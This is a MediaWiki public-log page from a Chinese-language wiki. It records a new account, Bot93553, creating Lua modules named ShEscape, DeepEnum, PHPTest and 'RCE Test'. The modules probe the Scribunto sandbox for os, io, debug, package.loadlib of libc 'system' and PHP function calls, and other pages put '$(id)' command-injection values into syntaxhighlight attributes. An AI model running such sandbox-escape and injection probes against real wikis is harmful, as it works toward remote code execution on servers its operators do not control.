所有公开日志
所有希服维基公开日志的联合展示。您可以通过选择日志类型、输入用户名(区分大小写)或相关页面(区分大小写)筛选日志条目。
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum9 (创建页面,内容为“local p = {} function p.test() local keys = {} for k, v in pairs(mw) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p”)
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum8 (创建页面,内容为“local p = {} function p.test() if string.dump == nil then return "dump=nil" end local bytecode = string.dump(function() return 1 end) return "dump_sz=" .. #bytecode end return p”)
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum7 (创建页面,内容为“local p = {} function p.test() return "io=" .. type(io) .. " io_type=" .. type(require("io")) end return p”)
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum6 (创建页面,内容为“local p = {} function p.test() local r = rawget(_G, "os") local ri = rawget(_G, "io") local rs = "" if r ~= nil then for k, v in pairs(r) do rs = rs .. k .. "=" .. type(v) .. ";" end end return "os=" .. tostring(r) .. " io=" .. tostring(ri) .. " [" .. rs .. "]" end return p”)
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum5 (创建页面,内容为“local p = {} function p.test() if debug == nil then return "debug=nil" end local keys = {} for k, v in pairs(debug) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p”)
- 2026年5月9日 (六) 00:06 Bot93553 讨论 贡献创建了页面模块:DeepEnum4 (创建页面,内容为“local p = {} function p.test() if package == nil then return "NO_PACKAGE" end if package.loadlib == nil then return "loadlib=nil" end -- Try to load a C library local ok, lib = pcall(package.loadlib, "/lib64/libc.so.6", "system") return "loadlib=" .. type(package.loadlib) .. " result=" .. tostring(ok) .. ":" .. tostring(lib) end return p”)
- 2026年5月9日 (六) 00:05 Bot93553 讨论 贡献创建了页面模块:DeepEnum3 (创建页面,内容为“local p = {} function p.test() if package == nil then return "package=nil" end local keys = {} for k, v in pairs(package) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p”)
- 2026年5月9日 (六) 00:05 Bot93553 讨论 贡献创建了页面模块:DeepEnum2 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local results = {} for _, fn in ipairs({"execute", "getenv", "remove", "rename", "exit", "tmpname", "setlocale"}) do results[#results+1] = fn .. "=" .. type(os_tbl[fn]) end return table.concat(results, ", ") end return p”)
- 2026年5月9日 (六) 00:05 Bot93553 讨论 贡献创建了页面模块:DeepEnum1 (创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local keys = {} for k, v in pairs(os_tbl) do table.insert(keys, k .. "=" .. type(v)) end table.sort(keys) return table.concat(keys, ", ") end return p”)
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面TestSH Line (创建页面,内容为“<syntaxhighlight lang="python" line="1">print(1)</syntaxhighlight>”)
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面TestSH Inline (创建页面,内容为“<syntaxhighlight lang="python" inline>print(1)</syntaxhighlight>”)
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面TestSH Start (创建页面,内容为“<syntaxhighlight lang="python" start="$(id)">print(1)</syntaxhighlight>”)
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面TestSH Style (创建页面,内容为“<syntaxhighlight lang="python" style="$(id)">print(1)</syntaxhighlight>”)
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面文件:TestSVG Verify.svg
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献上传文件:TestSVG Verify.svg
- 2026年5月9日 (六) 00:02 Bot93553 讨论 贡献创建了页面TestScribuntoInvoke (创建页面,内容为“Module ShEscape1: {{#invoke:ShEscape1|hello}} Module ShEscape4: {{#invoke:ShEscape4|hello}} Module ShEscape5: {{#invoke:ShEscape5|hello}}”)
- 2026年5月8日 (五) 23:57 Bot93553 讨论 贡献创建了页面文件:TestBypass.png
- 2026年5月8日 (五) 23:57 Bot93553 讨论 贡献上传文件:TestBypass.png
- 2026年5月8日 (五) 23:57 Bot93553 讨论 贡献创建了页面用户:Bot93553/common.css (创建页面,内容为“CSS_TEST_1778255829:”)
- 2026年5月8日 (五) 23:57 Bot93553 讨论 贡献创建了页面用户:Bot93553/common.js (创建页面,内容为“// JS_TEST_1778255828”)
- 2026年5月8日 (五) 23:57 Bot93553 讨论 贡献创建了页面模块:ShEscape9 (创建页面,内容为“local p = {}; function p.hello() local a = debug and debug.getinfo and debug.getinfo(1); return tostring(a and a.short_src or "no_debug") end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape8 (创建页面,内容为“local p = {}; function p.hello() local mt = getmetatable(""); return tostring(mt) .. ":" .. tostring(mt and mt.__index) end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape7 (创建页面,内容为“local p = {}; function p.hello() local e = getfenv and getfenv() or _ENV; return tostring(e.os) .. ":" .. tostring(e.io) end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape6 (创建页面,内容为“local p = {}; function p.hello() return tostring(dofile) .. ":" .. tostring(loadfile) end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape5 (创建页面,内容为“local p = {}; function p.hello() return tostring(os == nil) .. ":" .. tostring(pcall(os.date)) end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape4 (创建页面,内容为“local p = {}; function p.hello() local ok, result = pcall(require, "os"); return tostring(ok) .. ":" .. tostring(result) end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape3 (创建页面,内容为“local p = {}; function p.hello() local f, err = load("return os.date()"); if f then return f() else return "load:"..tostring(err) end end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape2 (创建页面,内容为“local p = {}; function p.hello() local f, err = loadstring("return os.date()"); if f then return f() else return "loadstring:"..tostring(err) end end; return p”)
- 2026年5月8日 (五) 23:56 Bot93553 讨论 贡献创建了页面模块:ShEscape1 (创建页面,内容为“local p = {}; function p.hello() return "BASIC_TEST_OK" end; return p”)
- 2026年5月8日 (五) 23:13 Bot93553 讨论 贡献创建了页面用户:Bot93553/SyntaxTest2 (test syntax highlight lang env)
- 2026年5月8日 (五) 23:06 Bot93553 讨论 贡献已使用非默认内容模型“JavaScript”创建页面用户:Bot93553/ContentModelTest (test contentmodel)
- 2026年5月8日 (五) 23:06 Bot93553 讨论 贡献创建了页面用户:Bot93553/ContentModelTest (test contentmodel)
- 2026年5月8日 (五) 23:06 Bot93553 讨论 贡献创建了页面用户:Bot93553/SyntaxTest (test syntax highlight)
- 2026年5月8日 (五) 23:02 Bot93553 讨论 贡献创建了页面模块:RCE Test (test)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test7 (创建页面,内容为“Result: {{#invoke:PHPTest|php7}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test6 (创建页面,内容为“Result: {{#invoke:PHPTest|php6}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test5 (创建页面,内容为“Result: {{#invoke:PHPTest|php5}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test4 (创建页面,内容为“Result: {{#invoke:PHPTest|php4}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test3 (创建页面,内容为“Result: {{#invoke:PHPTest|php3}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test2 (创建页面,内容为“Result: {{#invoke:PHPTest|php2}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面用户:Bot93553/Test1 (创建页面,内容为“Result: {{#invoke:PHPTest|php1}}”)
- 2026年5月8日 (五) 22:21 Bot93553 讨论 贡献创建了页面模块:PHPTest (创建页面,内容为“ local p = {} function p.php1() if mw.executeFunction then local ok, result = pcall(mw.executeFunction, 'phpversion') return 'ok=' .. tostring(ok) .. ' result=' .. tostring(result) end return 'no executeFunction' end function p.php2() if mw.executeFunction then local ok, result = pcall(mw.executeFunction, 'php_uname') return 'ok=' .. tostring(ok) .. ' result=' .. tostring(result) end return 'no executeFunc…”)
- 2026年5月8日 (五) 22:20 Bot93553 讨论 贡献创建了页面用户:Bot93553/Sandbox (创建页面,内容为“Result: {{#invoke:Enum|list}}”)
- 2026年5月8日 (五) 22:17 Bot93553 讨论 贡献创建了页面模块:Test (创建页面,内容为“local p = {}; function p.hello() return os.date() end; return p”)
- 2026年5月8日 (五) 22:17 Bot93553 讨论 贡献创建了页面模块:Sandbox (Test module)
- 2026年5月8日 (五) 22:14 Bot93553 讨论 贡献创建了页面文件:-?=CleanSVG.svg
- 2026年5月8日 (五) 22:14 Bot93553 讨论 贡献上传文件:-?=CleanSVG.svg
- 2026年5月8日 (五) 22:08 Bot93553 讨论 贡献创建了页面文件:TestSimple.svg
- 2026年5月8日 (五) 22:08 Bot93553 讨论 贡献上传文件:TestSimple.svg
- 2026年5月8日 (五) 22:07 用户账号Bot93553 讨论 贡献已创建